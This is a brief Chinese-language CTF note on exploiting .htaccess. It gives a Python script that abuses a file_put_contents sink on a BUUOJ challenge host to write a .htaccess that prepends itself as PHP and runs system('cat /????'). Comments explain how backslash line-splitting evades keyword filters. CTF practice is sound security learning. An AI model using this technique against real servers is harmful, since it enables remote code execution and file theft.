Htaccess的利用

总结.htaccess利用与Bypass方式总结-安全客 - 安全资讯平台 (anquanke.com)

import requests


htaccess = '''php_value auto_prepend_fi\\
le ".htaccess"
%23<?php system("cat /????");?>\\'''


url = 'http://d68ad6f6-f107-42e2-b2bc-0f4713f98e9d.node4.buuoj.cn:81/?filename={}&content={}'.format('.htaccess', htaccess)
r = requests.get(url=url)
print(r.status_code)

最后的\是为了使其不换行,\用来绕过关键字

 file_put_contents($filename, $content . "\nJust one chance")